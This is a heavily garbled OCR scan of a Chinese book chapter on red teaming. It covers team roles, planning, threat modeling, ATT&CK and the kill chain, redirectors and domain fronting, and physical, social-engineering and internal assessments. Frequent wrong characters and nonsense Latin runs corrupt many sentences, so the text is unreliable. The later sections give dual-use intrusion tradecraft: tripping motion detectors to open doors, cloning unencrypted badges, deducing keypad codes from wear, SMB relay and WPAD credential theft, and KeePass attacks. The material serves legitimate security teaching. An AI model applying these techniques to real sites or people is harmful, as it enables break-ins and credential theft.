红 队 可 以 综合 使 用 上 述 所 有 评 佑 形式。 对 特定 目标 或 应 用 程序 进行 秘密 的 漏 铜 
评 佑 、 渗 透 测试 、 社 交工 程 评 估 和 物理 安全 评估 。 红 队 演 练 的 范围 和 焦点 各 有 不 同 。 
ZT BYR ae ee: 秘 而 不 家 。 意 队 不 知道 目 己 面临 的 是 其 实 攻击 还 是 模拟 
攻击 ， 基 于 此 种 场景 ， 蓝 队 必须 检测 、 啊 应 安全 事件 ， 并 从 灾难 中 恢复 ， 在 此 过 程 
中 ， 锻 炼 和 提高 应 总 啊 应 能 力 。 

在 测试 活动 中 ， 鉴 队 和 红 队 之 间 的 沟 吉 十 分 有 限 。 这 样 ， 红 队 可 以 近乎 实战 地 
模拟 实际 攻击 。 日 队 (White Teaming) 由 不 同 的 利益 相关 方 组 成 ， 成 员 可 能 来 目 业 务 
部 门 、 技 术 团 队 ， 叉 或 者 是 项 目 经 理 、 业 务 分 析 师 。 日 队 提 供 一 个 抽象 屋 ， 确 保 红 
BAS Wa BAP YAH ESS PRA. HERE 
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红 队 评估 也 有 目标 和 断言 (Assertiom)。 断 言 通 币 是 :“ 网 络 是 安全 的 ”或 “不 擎 
担 相 关 知 识 的 攻击 者 无 法 渗 漏 机 密 数 据 。” 此 后 的 测试 活动 专注 于 验证 上 断言 的 真 伪 。 
红 队 评估 的 一 个 主要 目标 是 : 在 不 加 通告 的 情况 下 ， 真 实地 模拟 一 个 实力 强大 的 攻 
击 者 。 红 队 独 立 于 蓝 队 ， 通 党 根据 成 熟 的 安全 程序 在 组 织 中 执行 测试 工作 。 很 多 组 
织 都 使 用 下 面 描述 的 紫 队 完善 检测 、 啊 应 和 恢复 过 程 。 


4. 紧 队 (Purple Teaming) 


下 一 草 将 深入 介绍 紧 队 。 紧 队 具 有 红 队 演练 中 的 所 有 组 件 ， 但 或 励 赣 队 和 红 队 
之 间 开 展 沟通 。 两 个 小 组 之 间 的 交流 可 以 是 持续 的 , 通 第 会 目 动 执行 很 多 测试 活动 。 
红 队 依然 独立 于 瘟 队 ， 但 他 们 在 评 佑 过 程 中 携手 工作 ， 完 善 安全 控制 措施 。 


7.2 红 队 的 目标 


红 队 演练 的 价值 烦 高 ， 将 十 分 真实 地 评估 安全 控制 措施 的 有 效 性 。 红 队 与 赣 队 
相互 独立 ， 可 在 最 大 程度 上 减少 偏见 ， 进 行 更 准确 的 评估 。 与 渗透 测试 一 样 ， 红 队 
渗 练 可 用 于 合 规 目 的 。 例 如 ， 红 队 的 目标 可 以 是 确定 是 否 会 渗 漏 信用 卡 数据 。 

红 队 的 核心 是 基于 断言 确定 评估 目标 。 断 言 (Assertiom 实 际 上 是 一 个 假设 
(Assumption)。 组 织 通 第 假设 控制 是 有 效 的 ， 无 法 弦 过 。 但 新 汤 油 会 不 断 产 生 ， 人 
为 错误 和 环境 变化 都 会 对 分 段 隔 离 、 代 理 和 防火 墙 等 安全 控制 措施 的 有 效 性 产生 
影 啊 。 

红 队 一 般 循 环 执 行 约定 的 过 程 。 重 复 循环 允许 是 队 经 历 红 队 的 评 佑 ， 建 立 如 何 
改善 控制 和 过 程 的 假 人 设 ， 然 后 在 下 一 次 循环 中 测试 假设 是 否 有 效 。 重 复 执行 这 个 过 
程 ， 直 全 组 织 满足 残余 风险 水 平 的 要 求 。 

Mitre 的 网 络 演练 手册 Cyzper Exercise Playbook 包 含 可 用 于 红 队 演练 的 宝贵 信息 ， 
下 面 的 测试 目标 惑 摘 目 这 个 资源 : 

e 确定 在 演练 前 为 组 织 员工 提供 的 网 络 培训 是 否 有 效 。 
评估 组 织 应 急 报告 以 及 分 析 策 略 和 流程 的 有 效 性 。 
评估 蓝 队 在 演练 过 程 中 检测 并 适当 应 对 敌 童 活动 的 能 力 。 
评估 组 织 确定 网 络 攻击 对 运营 的 影响 能 力 ， 以 及 实施 合理 恢复 过 程 的 能 力 。 
确定 场景 计划 和 执行 的 有 效 性 ， 确 定 红 队 、 葛 队 和 白 队 之 间 沟 通 的 有 效 性 。 
理解 对 IT 系 统 失去 信心 意味 看 什么 ， 并 有 相关 的 备 选 方 案 。 
公开 并 加 国 网 络 安全 系统 中 的 罚 反 。 
公开 并 加 固 网 络 运 维 蛇 略 和 流程 中 的 弱点 。 
为 了 在 充满 敌意 的 环境 中 正 向 运营 ， 确 定 需 要 哪些 增强 和 功能 来 保护 信息 
系统 。 
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e 增强 网 络 安全 意识 ， 提 高 战备 程度 Readiness) 和 整体 协调 性 。 
e 制定 应 急 计 划 ， 以 便 在 部 分 或 全 部 IT 系统 出 现 故 障 时 可 以 生存 下 来 。 


7.3 ”常见 问题 


必须 理解 红 队 在 哪些 地 方 可 能 “脱轨 (Off the Rail)”. 红 队 面临 着 一 些 常 见 挑 战 ， 
必须 了 解 到 这 一 点 ,以便 能 提前 解决 这 些 问 题 。Justin Warer 的 Common Ground 博客 
中 包含 大 量 关 于 红 队 评估 的 信息 ， 建 议 访问 该 资源 。 


7.8.1 汇 围 受 限 


红 队 要 取得 成 功 ， 吏 必须 能 像 坏 人 那样 通过 各 种 手段 去 控制 测试 环境 。 然 而 ， 
大 多 数组 织 部 有 一 些 十 分 看 午 的 核心 资产 ， 出 于 过 上 度 冶 防 的 考虑 ， 不 愿意 让 这 些 资 
产 面 临 任何 风险 ， 包 括 红 队 演 练 。 这 种 片面 的 心态 将 严 章 妨碍 红 队 的 工作 ， 使 预期 
的 注 练 收益 大 打折 扣 。 


7.3.2 时 间 受 限 


大 多 数组 织 很 难 区 分 渗透 测试 和 红 队 演练 。 为 了 真正 模拟 真实 的 敌意 行为 ， 红 
队 必 须 利 用 足够 的 时 间 进 行 评 佑 ， 在 不 引发 警报 的 情况 下 获得 访问 权限 。 坏 人 往往 
用 数 月 甚 全数 年 的 时 间 准 备 实施 攻击 ， 而 大 多 数 红 队 则 必须 在 短 得 多 的 时 间 里 完成 
同样 的 目标 。 对 大 多 数组 织 而 言 ， 持 续 不 断 地 进行 红 队 演练 过 于 帅 贯 ， 而 这 一 反正 
是 大 多 数 恶 童 攻 击 者 乐于 看 到 的 。 评 估 时 间 应 当 足 够 长 , 但 必须 写 明 结束 时 间 ( 结 束 
后 ， 才 可 就 评估 执行 情况 询问 红 队 )。 


7.3.3 人 参与 者 受 限 


为 了 在 一 次 演练 中 取得 最 佳 效果 ， 组 织 可 能 让 尽 可 能 多 的 重量 级 人 物 尽量 参与 
进来 。 最 好 让 组 织 中 的 每 个 员工 都 参与 ， 但 最 终 ， 由 于 员工 都 有 其 他 事情 要 做 ， 除 
非 确 有 必要 ， 大 部 人 员工 并 不 会 真正 参与 。 尽 量 增加 参与 度 ， 特 别 是 执行 官 级 别 的 
参与 度 ， 但 心里 要 知道 一 -大 家 都 很 性 ， 未 必 有 空 。 


7.3.4 克服 条 件 的 限制 


要 克服 条 件 的 限制 ， 需 要 有 一 些 创意 ， 并 进行 一 些 协 作 ， 可 使 用 几 种 策略 。 如 
来 范 围 受 限 , 不 允许 红 队 对 特定 的 关键 系统 进行 测试 ， 那么 可 在 QA 实验 室 进 行 ， 此 
时 测试 产生 的 效 末 与 在 生产 环境 中 产生 的 效 采 是 相似 的 。 
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可 使 用 白 卡 (White Card) 概 念 殉 服 一 些 条 件 的 限制 , 白 卡 是 评估 的 模拟 部 分 。 向 
假设 至 少 有 一 个 用 户 将 单 击 钓鱼 邮件 ， 因 此 白 卡 方法 将 模拟 用 户 单 击 钓 鱼 邮 件 ， 从 
而 使 红 队 渗透 到 环境 中 。 显 然 ， 钩 鱼 并 非洲 入 环境 的 唯一 途径 ， 上 日 卡 可 用 来 模拟 心 
怀 恶 意 的 内 部 人 员 、 共 谋 犯 ， 模 拟 将 存在 漏洞 的 资产 纳入 组 织 ， 通 过 可 信 的 供应 商 
从 后 门 访问 等 。 


7.4 74H 


ZLBA ERST TRIS RAN, W TE BERR IG SA T 2E. DU, WR 
ZLBA YER RISE ZE124* H. WA RRR HAA T “UMA” uA. ETUR 
环 为 时 3 个 月 。 这 样 安 排 允 许 红 队 在 3 个 月 内 执行 攻击 模拟 , 在 此 次 测试 循环 结束 后 ， 
将 简要 信息 辣 知 列队 ; 蓝 队 接 痢 基于 吸取 的 教训 进行 研究 和 改进 。 红 队 与 监 队 的 沟 
通 必须 通过 日 队 促 成 。 大 多 数 情况 下 ， 上 日 队 将 确保 红 队 和 上 是 队 之 间 不 会 诡 互 ， 只 有 
在 测试 循环 结束 时 ， 才 让 两 个 小 组 聚 在 一 起 讨论 。 


7.4.4 规划 会 议 


在 白 队 的 支持 下 ， 红 队 和 蓝 队 在 一 系列 规划 会 议 期 间 一 起 工作 。 红 队 评估 规划 
会 议 最 初 只 是 概念 上 的 讨论 ， 最 后 在 评估 开始 前 完成 详细 规划 。 

规划 起 初 概括 描述 红 队 评估 目标 、 断 言 和 约定 规则 。 将 这 些 条 目 进行 完善 和 定 
案 后 ， 红 队 负责 人 以 及 参与 评估 的 其 他 团队 的 负责 人 都 需要 签字 。 

需要 在 规划 会 议 中 概述 红 队 评估 中 的 不 同 组 件 。 讨 论 的 要 点 如 下 ; 
除了 进行 技术 测试 ， 还 要 执行 桌面 演练 吗 ? 
将 涉及 哪些 场景? 
将 创建 哪些 交付 结果 ， 交 付 频 率 是 多 少 ? 
将 要 测试 哪个 环境 ? 

根据 评估 的 性 质 ， 可 能 不 给 评估 团队 提供 技术 信息 ， 也 可 能 提供 很 多 技术 信息 
(例如 ， 架 构 、 网 络 图 及 数据 流 等 )。 

还 需要 考虑 如 下 后 勤 事项 : 

。 需要 现场 工作 吗 ? 

e 为 了 能 在 现场 工作 ,需要 哪些 类 型 的 签证 , 需要 配备 翻译 人 员 吗 ? 需要 考虑 

支付 交通 费 和 差旅费 中? 

会 议 应 当 确定 执行 项 目 、 正 常 评估 时 间 表 、 研 究 结果 的 目标 日 期 ， 还 要 确定 每 

个 团队 的 联络 员 。 
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7.4.2 ”确定 可 衡量 的 事件 


在 攻击 类 型 的 每 个 步骤 ， 需 要 通过 衡量 一 系列 活动 确定 以 下 事项 : 

e MAA aay? 

e x A C S UI BK AR ri e & TRAY [R] ? 

e 监 队 局 动 啊 应 活动 需要 多 长 时 间 ? 

e 事件 修复 需要 多 长 时 间 ? 

红 队 和 更 队 都 必须 密切 跟踪 目 己 的 工作 。 沟 通 频 这 取决 于 多 种 因素 ， 但 一 般 而 
言 ， 全 少 每 三 个 月 要 交换 一 次 信息 ; 然后 根据 测试 循环 的 持续 时 间 ， 确 定 是 售 加 快 
频率 。 在 红 队 评估 期 间 ， 文 档 记 录 (Documentation) 人 到头 重 要 。 通 弟 ， 红 队 和 监 队 会 
ANTE] EHE e H APESE Eo 


1. 红 队 


拥有 训 试 活动 日 志 全 天 重 要 。 糊 确 跟 踩 东 些 操作 的 执行 日 期 和 时 间 ， 这 样 组 织 
可 确定 检测 到 了 红 队 的 哪些 活动 ， 未 检测 到 红 队 的 哪些 活动 ， 其 中 后 者 更 重要 。 红 
队 每 天 都 要 记录 测试 活动 、 执 行 时 间 、 完 成 的 具体 工作 以 及 测试 结 采 。 

除了 创建 可 交付 成 采 以 报告 红 队 的 工作 外 ， 还 必须 记录 测试 活动 。 红 队 应 当 能 
够 确定 什么 人 或 什么 事 对 环境 产生 了 影响 ， 有 共 体 做 法 是 什么 ， 并 确定 每 次 测试 行动 
的 结 末 。 这 意味 看 ， 应 当 针 对 红 队 使 用 的 每 个 系统 和 工具 做 好 记录 。 


2. 蓝 队 


葛 队 始终 应 当 跟 踊 目 己 的 啊 应 活动 。 这 包括 被 归 类 为 “事故 (Incident)” 的 事件 、 
归 类 为 “ 误 报 (False Positive)” 的 事件 、 归 类 为 “轻敌 (Low Severity)” WE. [F 
步 比 较 蝎 队 的 文档 与 红 队 的 测试 活动 ， 束 可 以 执行 分 析 。 分 析 将 确定 哪些 防御 策略 
是 有 效 的 ， 哪 些 无 效 ， 并 确定 哪些 事件 分 类 有 误 ， 例 如 ， 和 是 售 将 高 优先 级 事件 钳 误 
地 归 类 到 了 轻微 或 中 等 程度 事件 。 有 些 组 织 只 跟踪 达到 安全 事故 级 别 的 事件 ， 这 是 
错误 的 。 必 须 能 够 及 时 回顾 ， 并 理解 为 什么 将 一 些 事 件 标 记 为 误 报 或 进行 了 错误 的 


分 类 。 


7.5 理解 威胁 


如 前 面 蔓 节 所 述 ， 了 解 政 方 观点 是 制 定 战 本 和 执行 实际 模拟 的 关键。 目标 古 
根据 历史 背景 信息 开 友 一 个 早期 预 营 系统 。 了 解 谁 在 过 去 采用 哪 种 战术 攻击 过 组 
ZA, 这 对 理解 如 何 保护 好 组 织 至 关 重 要 。 要 获取 背景 信息 , 通常 视野 要 开阔 一 些 ， 
了 解 有 哪些 恶意 攻击 者 正在 攻击 组 织 的 兄弟 公司 或 竞争 对 于 。 现 在 ， 或 励 同 一 行 
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业 的 多 家 公司 共享 安全 信息 ,要 了 解 行 业 特 定 的 威胁 , 这 是 一 个 重要 的 信息 来 源 。 

分 析 曾 攻击 过 所 在 组 织 的 敌 方 是 十 分 重要 的 。 敌 方 是 谁 ? 恶意 攻击 者 的 动机 是 
什么 ? 恶意 攻击 者 的 导 用 仗 俩 是 什么 ?使 用 哪 种 恶意 软件 攻击 ? 兽 笠 试用 过 其 他 哪 
些 攻 击 行为 ? 通过 分 析 亚 意 攻 击 者 的 历史 活动 ， 可 以 确定 淤 在 攻击 的 影响 。 理 解 了 
威胁 ， 也 有 助 于 查找 有 晶 点 ， 并 确定 处 理 讶 点 的 最 佳 安 全 策略 。 必 须 确定 攻击 组 织 的 
是 一 个 发 达 国 家 ,还 是 苋 争 对 手 、 黑 客 行 为 主义 者 (Hactivist)， 换 或 是 有 组 织 的 犯罪 
i. RIP RIAN RHE, KE MAMA o 

同样 重要 的 是 : 要 清晰 地 知道 , ZAZA ES ee ot Ae eT EJ e 
此 时 可 使 用 传统 的 威胁 建 模 , 威 胁 建 模 有 助 于 用 体系 化 方法 消除 最 可 能 出 现 的 威胁 。 
使 用 威胁 建 模 时 ， 通 常 先 识别 需要 保护 的 资产 ， 对 组 织 的 业务 而 言 ， 关 键 业 务 系统 
是 什么 ? 环境 中 保存 看 哪些 机 密 信 息 ? 重要 和 机 蜜 数据 沉 有 哪些 ? 

接 下 来 ， 组 织 需 要 在 红 队 演练 中 评估 目标 资产 的 当前 架构 。 如 果 这 些 演练 涉及 
整个 企业 ， 则 有 必要 了 解 整 个 组 织 坏 境 ， 包 括 信 息 边 界 以 及 环境 的 出 入 口 。 同 样 ， 
如 采 红 队 演 练 针 对 的 是 特定 数据 集 或 应 用 程序 ， 亦 同样 适用 ， 需 要 记录 所 有 组 件 和 

对 染 构 进行 分 解 是 文档 记录 的 关键 。 使 用 了 哪 种 确 层 网 络 ? EH IE EAS 
构 组 件 ? 通过 对 坏 境 或 应 用 程序 进行 分 解 ， 可 发 现 设 计 和 部 区 方 式 的 缺陷 。 使 用 了 
哪些 信任 天 系 ? 哪些 组 件 (例如 ， 目 录 服 务 、 事 件 日 志 、 文 件 系 统 和 DNS 服 务 占 等 ) 
与 安全 资源 进行 交互 ? 

使 用 威胁 模板 记录 已 确定 的 所 有 威胁 及 相关 起 因 。 开 放 Web 应 用 程序 安全 项 目 
(Open Web Application Security Project，OWASP) 推 出 了 使 用 STRIDE 和 DREAD 的 早 
越 威 胁 风险 模型 。STRIDE 威 胁 分 类 方案 根据 使 用 的 攻击 类 型 或 攻击 者 的 动机 进行 
分 类 ; DREAD 威 胁 分 类 方案 确定 每 个 受 评估 的 威胁 产生 的 风险 大 小 ， 进 行 比较 ， 并 
排 定 优 先 级 。 创 建 一 个 恰当 的 系统 威胁 评估 方案 ， 有 助 于 优化 测试 方法 。 


7.6 攻击 框架 


使 用 攻击 框架 ， 是 规划 红 队 活动 攻击 部 分 的 最 全 面 方式 。 有 一 些 攻击 框 染 和 清 
单 可 供 使 用 ,是 红 队 的 绝 佳 资 源 。 最 有 用 的 一 个 是 Mitre 的 攻击 者 拉 术 、 战 术 知 识 库 
和 模型 (Mitre Adversarial Tactics Techniques & Common Knowledge, Mitre ATT&CK) 
FEB. AFERESSES TTT, Gta AA Windows. MacflLinux RARE EKE, 
以 及 面 癌 企业 的 矩阵 。 和 矩阵 分 类 包括 专注 于 以 下 方面 的 攻击 : 持久 性 、 权 限 提升 、 
防御 规避 、 和 凭据 访问 、 发 现 、 横 回 移 动 、 执行 、 收 集 、 泄露 以 及 命令 与 控制 (Command 
and Control, C2). 
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一 般 而 言 ， 最 好 根据 行业 框架 或 标准 从 事 安全 工作 。 既 然 可 以 站 在 巨人 屑 上 ， 
又 何必 重新 发 明 轮 子 ? 借助 框架 ， 红 队 的 工作 就 有 了 可 信和 度 ， 而 且 攻 击 列表 中 可 以 
包含 多 个 贡献 者 输入 的 内 容 。 有关 攻 击 信 息 的 男 一 个 不 错 来 源 是 久 经 考验 的 OWASP 
攻击 列表 。OWASP 攻 击 列表 包含 资源 协议 恶意 操控 、 日 志 注 入 、 代 人 码 注 入 和 SQL 
注入 等 攻击 类 列 。 

提 到 网 络 攻击 ， 就 不 得 不 谈 及 党 殉 希 德 。 马 ] 汪 公司 (Lockheed Martin IFAM Id 
络 杀 伤 链 (Cyber Kill Chain) 框 架 。 网 络 东 伤 链 框 染 认为 网 络 攻 击 通 疝 塌 循 相同 的 模 
式 ， 即 侦 守 (Reconnaissance)、 制 作 定 回 攻 击 工具 (Weaponizatiom)、 输 送 (Delivery)、 
漏洞 攻击 (Exploitation)、 安 装 (Installation)、 命 令 与 控制 (Command and Control, C2) 
并 对 目标 采取 行动 (Act on Object). “MEARE: 如 果 可 以 打 断 这 个 链 ， 束 可 
以 破坏 恶意 攻击 者 的 企图 。 网 络 东 伤 链 框 染 还 有 一 个 相应 的 对 策 组 件 。 其 目标 是 对 
攻击 者 进行 检测 、 拒 绝 、 中 断 、 降 级 或 欺骗 恶意 攻击 者 ， 并 打 电 攻 击 链 。 


7.7 ”测试 环境 


在 模拟 有 角力 的 收 方 攻击 时 ， 务 必 采 用 不 同方 式 来 保护 测试 环境 。 首 先 从 基础 
开始 。 持续 更 新 测试 环境 的 基础 架构 ， 并 及 时 打 好 补丁 。 蔓 队 最 终 会 答 试 阻止 入 侵 ， 
但 是 坚 儿 的 徐 方 会 预料 到 这 一 点 ， 并 通过 多 种 方式 加 以 对 抗 。 

使 用 香 定 同 右 (Redirector) 保 护 组 织 的 测试 基础 架构 。 和 章 定 同 右 刀 第 是 代理 ， 会 
查找 特 定 值 ， 仅 当 满 足 某 个 条 件 时 才 会 重 定 同 流量 。 赣 队 难以 判断 出 重 定 癌 堪 要 得 
找 的 值 , 因此 重 定 同 偶 提供 了 一 个 商 单 的 抽象 层 。 重 定 同 厚 有 多 种 形式 .Cobalt Strike 
的 创建 者 Raphael Mudge fi #2 fi FE S A RY HEE [a] #8, {Œ Raphael Mudge 的 
Infrastructure for Ongoing Red Team Operations 博 和 客 中 还 有 其 他 大 量 有 用 的 信息 。 

务必 根据 功能 来 隔离 测试 基础 架构 ， 尺 量 减 少 午 琶 。 在 每 个 主机 前 布置 重 定 问 
船 ， 永 远 不 要 让 目标 直接 接触 后 如 基础 架构 。 将 主机 分 布 在 多 个 服务 提供 商 处 、 多 
个 地 理 区 域 , 尽量 增加 元 余 度 。 在 整个 测试 期 间 持续 监测 所 有 相关 日 志 。 保持 警惕 ， 
在 文档 中 完整 记录 各 项 设置 。 

可 使 用 “ 转 储 管 道 Dump Pipe)” Wak “Prel Smart)” WEEMS. “FERE” 
型 重 定 同 器 将 所 有 来 日 A 点 的 流量 一 律 重 定 问 到 B 点 。 智 能 午 定 问 器 会 根据 条 件 , 将 
各 上 段 流 量 午 定 同 到 不 同 目的 地 ， 或 完全 丢弃 流量 。 章 定 同 器 可 以 迪 过 各 种 方式 基于 
HTTP 重 定 回 ， 例 如 使 用 iptables、socat 或 Apache mod-write 。 可 将 Apache mod-write 
配置 为 只 允许 日 名 单 中 的 URI 通 过 。 将 无 效 的 URI 将 重 定 同 到 一 个 正章 网 页 , 如 图 7-1 


1 HAVE: 本 书 还 会 提 及 Apache mod-write， 但 Apache 文 档 中 并 无 Apache mod-write 一 说 ， 与 
之 对 应 的 功能 称 为 Apache mod rewriting. 
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所 示 。 
. e [ Connecting 
€ spootdomain.com teat 


图 7-1 重 定 同 到 一 个 网 页 


可 使 用 iptables 或 socat 设 置 DNS 重 定 回 龙 。 同 样 ， 可 通过 Google App Engine. 
Amazon CloudFront 和 Microsoft Azure^ fay n] fid I3 Bii EL (Domain Fronting) 方 法 路 
由 流量 。 使 用 域 前 置 ,可 以 通过 合法 的 域 ,包括 .gov 顶 级 域名 (ITop-Level Domain, TLD) 
路 由 流量 。 


7.8” 目 适应 测试 


虽然 秘密 进攻 活动 是 红 队 评估 的 主要 部 分 ， 但 采用 目 适应 测试 方法 却 有 很 大 价 
值 。 红 队 执 行 的 秘密 进攻 活动 最 大 限度 地 模仿 高 阶 恶 意 攻击 者 的 做 法 。 而 目 适应 测 
试 方法 认为 ， 模 拟 那些 装备 简陋 的 低 阶 恶 意 攻 击 者 也 有 价值 ， 与 高 阶 恶 意 攻 击 者 相 
比 ， 低 阶 恶 意 攻 击 者 更 容易 被 检测 到 。 

长 期 的 红 队 评估 允许 进行 测试 循环 。 不 过 ， 组 织 可 以 设 定 一 定 的 节奏 策略 ， 先 
采用 自 适 应 测试 方法 ， 再 从 简陋 的 、 杂 乱 的 攻击 ， 转 移 到 悄 无 声息 的 秘密 进攻 。 例 
如 ， 可 执行 一 个 为 期 三 个 月 的 测试 循环 ， 在 此 期 间 ， 进 攻 活 动 从 易于 检测 发 展 到 难 
以 检测 。 完 成 这 个 循环 后 ， 将 召开 一 次 临时 会 议 ， 进 行事 后 的 调查 分 析 。 赣 队 可 了 
解 到 在 哪个 时 间 点 测试 活动 因为 被 检测 到 而 停止 ， 在 哪个 时 间 点 是 因为 “命中 雷达 
(Hitting Radar)” 而 停止 。 利 用 这 些 信息 ， 蓝 队 的 检测 能 力 逐 渐 成 熟 。 此 后 ， 接 下 来 
的 为 期 三 个 月 的 循环 又 开始 ， 此 时 ， 蓝 队 可 检验 一 下 自己 是 否 真 的 有 进步 。 

在 运用 目 适应 方法 时 ， 可 使 用 许多 不 同 的 战术 。 可 在 开始 时 ， 首 先 发 动 一 次 大 
型 钓鱼 活动 ， 看 一 下 组 织 如 何 啊 应 ， 此 后 转移 到 较 安 静 的 鱼 又 式 网 络 钓鱼 攻击 。 扫 
描 活动 之 初 采用 侵略 性 扫描 战术 ， 此 后 改 用 低 强 度 的 、 缓 慢 渗 透 的 方法 。 


7.8.1 外 部 评估 
在 听 到 “渗透 测试 ”或 “ 红 队 行动 ”时 ， 很 多 人 自然 会 想到 “外 围 安全 评估 ”。 


Sle 红 队 的 行动 


虽然 这 并 非 红 队 行 动 的 唯一 部 分 ， 但 在 外 围 模拟 政 方 进攻 十 分 重要 。 当 想到 具有 外 
部 视野 的 红 队 行动 时 ， 吏 会 想到 了 解 世界 各 地 的 坏人 在 用 计算 机 做 什么 有 多 重要 。 

大 多 数 红 队 活 动 会 整合 这 些 工 具 ， 首 先 扫 摘 环境 信息 ， 然 后 使 用 人 工 测试 活动 
利用 找到 的 弱点 进行 攻击 。 但 这 只 是 外 部 评 佑 的 一 部 分 。 还 必须 记 住 ， 红 队 演 练 还 
A “Near Site)” 部 分 ， 此 时 ， 红 队 可 杀 目 现 且 执行 攻击 。 除 了 可 通过 互联 网 访 
问 的 资源 ， 红 队 也 可 得 看 组 织 无 线 环 境 中 的 弱点 ， 以 及 与 移动 设备 连接 到 组 织 技术 
资产 相关 的 漏洞 。 

外 部 评估 可 专注 于 外 围 的 IT 资产 ， 如 电子 邮件 服务 器 、VPN、 网 站 、 防 火 才 和 
人 代理。 经常 有 组 织 将 远程 扣 面 协议 (Remote Desktop Protocol，RDP) 这 类 不 应 出 现在 
互联 网 上 的 内 部 协议 骏 露 在 互联 网 边界 上 。 


7.8.2 ”物理 安全 评估 


保护 对 组 织 设备 和 网 络 的 物理 访问 与 其 他 安全 控制 措施 同等 重要 。 很 多 红 队 行 
动 发 现 了 与 实际 使 用 的 锁 、 门 、 摄 像 系统 、 工 作证 系统 相关 的 问题 。 很 多 组 织 说 不 
清 易手 锁 、 好 门 锁 和 防护 板 之 间 的 区 别 。 因 为 擂 锁 这 项 技能 相对 好 学 ， 一 旦 得 手 ， 
可 以 获得 比 其 他 攻击 方式 更 大 的 访问 权 ， 因 此 ， 大 多 数 红 队 都 掌握 了 这 项 技能 。 

当 有 人 路 过 时 ， 运 动 检 测 器 可 以 打开 门 或 门 锁 。 这 也 为 想 要 对 组 织 进行 物理 访 
问 的 恶意 攻击 者 提供 了 可 乘 之 机 。 很 多 红 队 评估 人 员 都 通过 操纵 运动 检测 器 获得 了 
物理 访问 权 。 方 法 很 简单 ， 把 信封 贴 在 衣架 上 ， 在 两 扇 门 之 间 滑 动 ， 再 摆动 它 ， 就 
能 触发 位 于 门 的 男 一 侧 的 运动 检测 器 。 当 然 , 也 可 以 使 用 压缩 空气 触发 运动 检测 堪 。 

许多 工作 证 (Badge) 都 缺少 加 密 措 施 。 红 队 评 佑 人 员 喜 欢 使 用 的 一 种 方法 是 : M 
真正 的 员工 去 往 本 地 咖啡 馆 或 熟食 店 时 ， 评 估 人 员 站 在 佩戴 工作 证 的 人 员 的 身后 ， 
喝 上 一 杯 咖啡 或 啤酒 ， 就 获得 工作 证 的 复制 品 。 制 作 一 份 复制 品 的 费用 很 低 ， 只 要 
站 在 距离 目标 三 英尺 距离 以 内 就 能 复制 真正 员工 的 工作 证 ， 从 而 获得 与 这 些 真正 员 
工 同样 的 访问 组 织 设施 的 物理 权限 。 

摄像 系统 通 香 存 在 盲点 ， 或 分 辨 率 太 低 ， 所 拍 下 的 交通 工具 车 牌 模糊 不 清 。 密 
码 锁 的 访问 码 (Code) 很 少 更 改 。 通 常 可 通过 观察 磨损 和 变色 程度 ， 分 析出 四 个 访问 
码 数字 。 然 后 ， 按 正确 顺序 输入 四 个 数字 即 可 得 手 。 

环境 中 的 物理 威胁 多 得 数不胜数 ， 就 像 红 队 的 活动 一 样 ， 仅 受 限 于 测试 者 的 想 
象 力 。 


7.8.3 社交 工程 攻击 


KX, WACKER TRA, SA eZ VRAD At. WY 
通过 钓鱼 电子 邮件 、USB 张 动 硕 、 电 话 或 当面 交流 找到 目标 。 考 请 买 几 文 廉价 的 钢 
笔 ， 弄 一 副 眼 镜 ， 这 些 物件 都 包含 摄像 涉 ， 红 队 评 估 人 员 可 以 在 适当 时 候 疝 客户 或 
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组 织 重 播 视频 ， 以 展示 目 己 杀 号 冬 试 过 的 社交 工程 攻击 工作 成 末 。 

钓鱼 电子 邮件 可 制作 得 相当 精美 ， 其 中 包含 欺骗 性 电子 邮件 地 址 ， 以 及 十 分 精 
硝 的 外 观 。 也 可 发 送 粗 糙 的 、 包 舍 普 通 问 候 语 和 拼写 错误 的 电子 邮件 ， 看 一 下 用 户 
有 什么 有 反应。 钓鱼 攻击 的 两 个 组 件 是 “传送 ”和 “执行 WREAK A (Object 
Linking and Embedding，OLE)、.iso 文 件 、ISO 图 像 、 超 链接 和 电子 邮件 附件 是 第 见 
的 载 傈 传送 机 制 。.Ink 文 件 、VBScript、JavaScript、URL 和 HTML 应 用 程序 (HTA) 是 
Fe LEY BAF o 

当 尝试 收集 有 关 目 标的 信息 时 ， 不 要 低估 通过 社交 网 络 和 其 他 网 络 途 径 包装 
JPG AE. is AC YEUs(Cat Phishing) 是 一 个 术语 ， 用 于 描述 在 网 上 打造 迷人 的 
外 表 ， 然 后 有 选择 性 地 与 目标 进行 联系 。 互 联网 的 匿名 特性 意味 着 ， 人 们 需要 对 新 
网 友 提 高 警惕 。 此 外 ， 也 有 人 豆 欢 通过 拉 术 论坛 公开 大 量 信息 来 提升 形象 。 

最 后 ， 不 要 惧 介 在 别人 眼皮 展 下 隐藏 起 来 。 可 答 试 执行 一 次 啊 动 很 大 的 攻击 ， 
以 分 散 目 标的 注意 力 ， 而 你 真正 准备 肥 动 的 是 使 用 不 同 战术 的 秘密 攻击 。 


7.8.4 ”内 部 评估 


令 人 感到 惊奇 的 是 ， 有 时 候 必 须 说 服 组 织 ， 让 组 织 相信 对 组 织 内 部 进行 评估 的 
价值 。 一 次 内 部 评估 可 以 模拟 心 存 恶意 的 内 部 人 员 、 恶 意 软件 或 通过 物理 方式 进入 
内 部 的 外 部 攻击 者 。 通 过 内 部 评估 ， 可 很 好 地 衡量 组 织 对 进入 内 部 网 络 的 人 员 的 抵 
御 能 力 。 

如 果 环 境 配置 有 误 ， 没 有 凭证 (CredentiaD) 却 可 访问 网 络 端口 的 攻击 者 可 以 获得 
庞大 的 信息 。 当 可 以 访问 网 络 时 ， 各 种 中 间 人 攻击 已 被 证 明 是 有 效 的 。SMB 中 继 攻 
击 和 Windows 代 理 目 动用 现 (Windows Proxy Auto-Discovery, WPAD) 攻 击 一 直 可 用 来 
有 效 地 收集 作证 、 提 升 权限 ， 经 党 对 企业 造成 危害 。 

代 人 码 一 旦 在 用 户 的 加 面 会 话 中 运行 ， 束 可 利用 多 种 机 制 在 计算 机 上 布置 键盘 
记录 人 骼 或 捕获 屏幕 截图 。Cobalt Strike 的 Beacon 是 一 个 极其 可 靠 的 方法 。 按 目 定 义 
方式 编写 的 Start-ClipboardMonitorpsl 将 每 隔 固定 的 时 间 监 视盘 贴 板 ， 用 以 了 解 其 
中 复制 的 文字 的 变化 情况 。KeePass 是 一 种 流行 的 密码 保护 工具 ，KeePass 具 有 多 个 
攻击 行为 (包括 KeeThief， 这 是 由 @tifkin 和 @harmj0y 创 建 的 若 容 PowerShell 2.0 的 
